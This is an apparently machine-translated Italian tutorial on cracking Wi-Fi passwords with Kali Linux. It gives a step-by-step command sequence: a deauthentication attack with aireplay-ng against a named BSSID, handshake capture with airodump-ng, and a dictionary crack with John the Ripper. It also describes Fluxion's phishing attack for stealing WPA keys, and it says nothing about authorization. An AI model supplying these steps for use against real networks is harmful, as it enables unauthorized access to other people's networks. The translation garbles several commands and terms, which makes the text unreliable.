La maggior parte delle domande su Google è Come hackerare il Wifi usando Kali Linux, hackerare il wifi, come hackerare il Wifi usando Kali Linux,ecc. Ma in primo luogo Capire che cosa è Wifi & la sua crittografia.
Contenuto del post
- Cos’è il Wi-Fi ed è possibile hackerarlo?
- Strumenti Utilizzati Per Hackerare le Password WiFi In Kali-Linux
- Airmon-ng
- Aireplay-ng
- Airodump-ng
- Hccap
- John Lo squartatore
- Aircrack-ng
- Procedura Di Hack WiFi con Kali-Linux o Con Qualsiasi Altro Debian Linux OS.
- Fase 1 :
- Passo 2:
- Passo 3:
- Passo 4:
- Passo 5:
- Passo 6:
- Wifi Strumento di hacking :- Fluxion
- Crittografia wireless
- Crittografia WEP
- Come funziona WEP
- WPA Encryption
- Come funziona WPA
- Crittografia WPA 2
- WPA2 – Personal
- WPA2 – Enterprise
- Come funziona WPA2
Cos’è il Wi-Fi ed è possibile hackerarlo?
Wi-Fi è il nome di una popolare tecnologia di rete wireless che utilizza le onde radio per fornire Internet wireless ad alta velocità e connessioni di rete. Un malinteso comune è che il termine Wi-Fi è l’abbreviazione di “fedeltà wireless”, tuttavia questo non è il caso. Wi-Fi è semplicemente una frase marchio che significa IEEE 802.11 x.
Quando si parla di hacking wifi da qualsiasi dispositivo la sicurezza di quel wifi conta di più. Così, quando cerchiamo di incidere wifi è molto facile da decifrare o hackerare la password del sistema WPS disponibili. WPS è uno dei tipi di crittografia, che viene utilizzato per proteggere la rete wifi, in modo da lasciare iniziare con tutorial rapido.
Strumenti Utilizzati Per Hackerare le Password WiFi In Kali-Linux
Principalmente usiamo kali Linux integrato di strumenti per hackerare le password wifi che è a disposizione i seguenti:
- airmon-ng
- aireplay-ng
- airodump-ng
- hccap
- john the ripper
- aircrack-ng
Airmon-ng
Questo script può essere utilizzato per attivare la modalità monitor su interfacce wireless. Può anche essere utilizzato per tornare dalla modalità monitor alla modalità gestita. L’immissione del comando airmon-ng senza parametri mostrerà lo stato delle interfacce.
utilizzo: airmon-ng < start / stop > < interfaccia >o airmon-ng< check|check kill >
Aireplay-ng
Aireplay-ng viene utilizzato per iniettare fotogrammi.
La funzione principale è quella di generare traffico per l’uso successivo in aircrack-ng per il cracking delle chiavi WEP e WPA-PSK. Ci sono diversi attacchi che possono causare deautenticazioni allo scopo di catturare i dati di handshake WPA, autenticazioni false, replay di pacchetti interattivi, iniezione di richiesta ARP artigianale e reiniezione ARP-request. Con lo strumento packetforge-ng è possibile creare cornici arbitrarie.
La maggior parte dei driver deve essere patchata per poter iniettare.
Airodump-ng
Airodump-ng è utilizzato per la cattura di pacchetti di frame 802.11 raw ed è particolarmente adatto per la raccolta di WEP IV (Initialization Vector) per l’intento di utilizzarli con aircrack-ng. Se si dispone di un ricevitore GPS collegato al computer, airodump-ng è in grado di registrare le coordinate dei punti di accesso trovati.
Inoltre, airodump-ng scrive diversi file contenenti i dettagli di tutti i punti di accesso e i client visti.
Hccap
Per convertire gli hash di acquisizione aircrack-ng in .hccapx usiamo questo comando.
John Lo squartatore
Per decifrare la password usiamo john lo squartatore nella fase finale. usiamo questo strumento per confrontare gli hash con il dizionario delle password. Ci sono molti altri modi, ma proveremo uno di loro.
Aircrack-ng
Aircrack-ng è una suite completa di strumenti per valutare la sicurezza della rete WiFi.
Si concentra su diverse aree di sicurezza WiFi:
- Monitoraggio: Per la cattura dei pacchetti e l’esportazione dei dati in file di testo per l’ulteriore elaborazione di strumenti di terze parti
- Attacco: attacchi di tipo Replay, disconnessione, falsi punti di accesso e gli altri attraverso l’iniezione
- Test: Verifica delle schede WiFi e funzionalità del driver (cattura e iniezione)
- Cracking WEP e WPA PSK (WPA 1 e 2)
Procedura Di Hack WiFi con Kali-Linux o Con Qualsiasi Altro Debian Linux OS.
Tutti i comandi con la descrizione sono indicati sopra, controlla se hai qualche problema.
Fase 1 :
In primo luogo, prendere la scheda di rete in modalità monitor per monitorare le reti circostanti.
#airmon-ng start wlan1
#airodump-ng wlan1mon
Passo 2:
#airodump-ng –bssid 2C:55:D3:B1:35:0C -c 1 -w kalip300 wlan1mon
Passo 3:
#aireplay-ng -0 0-a 2C:55:D3:B1:35:0C wlan1mon
Dopo aver catturato con successo il file handshak vediamo qualcosa di simile.
Passo 4:
# aircrack-ng kalip300-01.cap-j john
Passo 5:
#hccap2john john.hccap > wpa
Passo 6:
#john-wordlist* / root / Desktop / rockyou.home-Istituto di Statistica
E abbiamo sucsessfully hack la password wifi da kali linux
Wifi Strumento di hacking :- Fluxion
Fluxion è un controllo di sicurezza e strumento di ricerca di social-engineering. È un remake di linset di vk496 con (si spera) meno bug e più funzionalità. Lo script tenta di recuperare la chiave WPA / WPA2 da un punto di accesso di destinazione mediante un attacco di social engineering (phishing). È compatibile con l’ultima versione di Kali (rolling). La configurazione degli attacchi di Fluxion è per lo più manuale, ma la modalità automatica sperimentale gestisce alcuni dei parametri di configurazione degli attacchi. Leggere le FAQ prima di richiedere problemi.
Crittografia wireless
Crittografia WEP
Wired Equivalent Privacy (WEP) è un protocollo wireless IEEE 802.11 che fornisce algoritmi di sicurezza per la riservatezza dei dati durante le trasmissioni wireless.
WEP utilizza un vettore di inizializzazione a 24 bit(IV) per formare il codice di flusso RC4 Per la riservatezza e il checksum CRC-32 per l’intergrità della trasmissione wireless.
Come funziona WEP
- Il checksum CRC-32 viene utilizzato per calcolare un valore ICV (Integrity Check Value) a 32 bit per i dati, che a sua volta viene aggiunto al frame di dati.
2. Un numero arbitrario a 24 bit noto come vettore di inizializzazione (IV) viene aggiunto alla chiave WEP; chiave WEP e IV sono chiamati insieme come seme WEP.
3. Il seme WEP viene utilizzato come input per l’algoritmo RC4 per generare un flusso chiave (flusso chiave è XOred bit-saggio con la combinazione di dati e ICV per produrre i dati crittografati).
4. Il campo IV (IV + PAD + KID) viene aggiunto al testo cifrato per generare MAC Frame
WPA Encryption
Wi-Fi Protected Access (WPA) è un metodo di crittografia dei dati per WLAN basato su 802.11 norme.
È un’istantanea di 802.11 i (in fase di sviluppo) che fornisce una crittografia più forte e abilita PSK per l’autenticazione EAP.
Come funziona WPA
La chiave di crittografia temporale, l’indirizzo di trasmissione e il contatore di sequenza TKIP (TSC) vengono utilizzati come input per l’algoritmo RC4 per generare la sequenza.
MAC Service Data Unit (MSDU) e message intergrity check (MIC) sono combinati utilizzando l’algoritmo Michael.
La combinazione di MSDU e MIC è frammentato per generare MAC Protocol Data Unit (MPDU).
Un valore ICV (Integrity Check Value) a 32 bit viene calcolato per MPDU
La combinazione di MPDU e ICV viene XORed bit per bit con Keysteam Per produrre i dati crittografati
L’IV viene aggiunto ai dati crittografati per generare il frame MAC.
Crittografia WPA 2
WPA 2 fornisce agli utenti aziendali e WI – FI una maggiore protezione dei dati e controllo dell’accesso alla rete
Fornisce sicurezza di livello governativo implementando l’algoritmo di crittografia AES conforme all’Istituto nazionale di standard e tecnologia (NIST) FIPS 140-2.
WPA2 – Personal
WPA2-Personal utilizza una password di configurazione (chiave pre-condivisa) per proteggere l’accesso non autorizzato alla rete.
In modalità PSK ogni dispositivo di rete wireless crittografa il traffico di rete utilizzando una chiave a 128 bit derivata da una passphrase da 8 a 63 caratteri ASCII.
WPA2 – Enterprise
Include EAP o RADIUS per l’autenticazione centralizzata del client utilizzando più metodi di autenticazione, come schede token, Kerberos, certificati ecc.
Agli utenti vengono assegnate le credenziali di accesso da un server centralizzato che devono presentare durante la connessione alla rete.
Come funziona WPA2
Nell’implementazione CCMP di WPA2, i dati di intestazione Mac vengono utilizzati per creare dati di autenticazione aggiuntivi (AAD).
Un numero di pacchetto sequenziato (PN) viene utilizzato per costruire nonce.
AAD, temporal key e nonce insieme a CCMP sono utilizzati per la crittografia dei dati.
Un frame MAC WPA2 è costruito utilizzando l’intestazione MAC, l’intestazione CCMP, i dati crittografati e il MICROFONO crittografato
Potresti perdere Come hackerare il telefono